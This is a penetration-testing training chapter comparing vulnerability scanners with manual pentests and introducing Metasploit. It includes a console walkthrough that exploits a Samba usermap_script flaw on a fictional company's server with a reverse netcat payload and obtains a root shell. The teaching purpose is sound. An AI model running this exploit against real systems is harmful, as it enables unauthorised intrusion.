Hacking VI: Vulnerability scanner and penetration testing frameworks
It goes without saying that many processes in a penetration test can and should be automated. We can write scripts, for example, that find web applications within a network. Another but more complex version of this example are vulnerability scanners, which automatically search for vulnerabilities in an IT system. Identifying vulnerabilities is not only the main task of a vulnerability scanner, but also our job as a penetration tester. The question then is whether a vulnerability scan can be compared to a penetration test and if not, how they differ from each other.
Vulnerability scans must be configured and started by a user. After that, a vulnerability scanner will automatically search for weak points. A penetration test, on the other hand, involves manual test phases, which naturally will take much longer. Also, vulnerability scanners can only identify known vulnerabilities, as they must be listed within the software. In addition, a pentester could search for new “unknown“ vulnerabilities or creatively combine multiple conditions to compromise an IT system. For example, a web server could access the files of an FTP server, only requiring an attacker to have FTP access in order to execute a command via PHP.
We identified another difference between vulnerability scanners and pentesters with regards to exploiting vulnerabilities. At the request of the client, pentesters will exploit vulnerabilities to figure out how deep an attacker would have been able to penetrate into the target system. A vulnerability scanner, on the other hand, can show false positives during vulnerability scans. This means that any auto-identified vulnerability must be manually verified.
Thus, a penetration test can include a vulnerability scan, but will actually do much more than that. It should be noted here that tools and, in particular, vulnerability scanners should only be used if their impact on the environment under investigation can be assessed. Otherwise, we are at a loss when a client contacts us about sudden malfunctions in the production system. We should also be aware that we can be hacked ourselves when executing third-party scripts or tools. It is therefore essential to look at the source code - if possible - and to take security precautions such as using isolated systems as a working platform.
There are currently many vulnerability scanners on the market. Two of the best known are Nessus and OpenVas. Nessus of Tenable Network Security is a commercial scanner that can be used on these platforms: Windows, Linux, Unix and Mac OS X. OpenVas only exists for Linux, however, but it is available for free as OpenSource software.
In addition to the current vulnerability scanners on the market, Rapid7 has designed its own penetration testing framework: Metasploit. Metasploit essentially provides a collection of exploits that can be customised to the needs of an attacker or tester with various options. To learn how to use it, Offensive Security designed its own publicly available training course: Metasploit Unleashed (https://www.offensive-security.com/metasploit-unleashed/). The following listing shows an example of how to use Metasploit to automatically exploit a vulnerability in the file server of Dubius Payment Ltd.:
~# msfconsole
msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set RHOST 10.247.97.48
RHOST => 10.247.97.48
msf exploit(usermap_script) > set RPORT 445
RPORT => 445
msf exploit(usermap_script) > set PAYLOAD cmd/unix/reverse_netcat
PAYLOAD => cmd/unix/reverse_netcat
msf exploit(usermap_script) > set LHOST 10.20.1.14
LHOST => 10.20.1.14
msf exploit(usermap_script) > set LPORT 4444
LPORT => 4444
msf exploit(usermap_script) > exploit
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Command shell session 1 opened (10.20.1.14:4444 -> 10.247.97.48:54765)
at Wed Nov 28 13:39.22 +0100 2017
ip addr show
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether d6:15:2f:c4:9a:96 brd ff:ff:ff:ff:ff:ff
inet 10.247.97.48/24 brd 10.247.97.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::d415:2fff:fec4:9a96/64 scope link
valid_lft forever preferred_lft forever
hostname
ftp01
id
uid=0(root) gid=0(root) groups=0(root)
Remark: The above scenario does not work in the practice lab.
If we want to compare the validity of vulnerability scans with the validity of penetration tests, we must have a clear understanding of the false negative ratio (FNR): how many vulnerabilities are not identified as such by a vulnerability scanner, even though the security gap exists? If you like, you can discover this for yourself by scanning the DMZ network of Dubius Payment with Nessus (7-day trial) or OpvenVas, for example. In your opinion, how many vulnerabilities will a vulnerability scan list? 0, 10, 25 or even more than 50?
Pentest Training
Take a look at the pentest training chapters and learn penetration testing:
- Preface
- Introduction
- Legal Framework
- Hacking vs. Penetration Testing
- Classification
- Meaningfulness of Penetration Tests
- Penetration Testing Standards
- The Hacking Guide
- Hacking I: Scanning networks
- Hacking II: Password attacks
- Hacking III: Web application attacks
- Hacking IV: Privilege Escalation
- Hacking V: Tunnelling Techniques
- Hacking VI: Vulnerability scanner and penetration testing frameworks
- Demonstration of a Penetration Test
- Risk Assessment of Identified Vulnerabilities
- Structure of Documentation and Reporting
- Insider stories: Tales from Dubius Payment Ltd.
binsec academy GmbH - Online IT Security Training with Practical Focus
binsec academy GmbH is provider of online IT security training, offering practical, lab-based courses for professionals. The academy provides hands-on training in areas such as penetration testing and secure software development. Participants gain practical experience through realistic lab environments, including simulations of company networks and applications. Courses are available in multiple programming languages and align with standards like OWASP Top 10 and PCI DSS. Upon successful completion, participants receive certifications such as the Binsec Academy Certified Pentest Professional (BACPP) and Binsec Academy Certified Secure Coding Professional (BACSCP), demonstrating their ability to identify and remediate security vulnerabilities.
Goto binsec acadmy GmbH

binsec GmbH – Experts in Penetration Testing
binsec GmbH is a German IT security company focused on professional penetration testing. With over 10 years of experience, the team conducts in-depth penetration tests on networks, web applications, APIs, and mobile apps. Certified experts systematically identify and document security vulnerabilities to support organizations in improving their security and meeting compliance requirements.
Goto binsec GmbH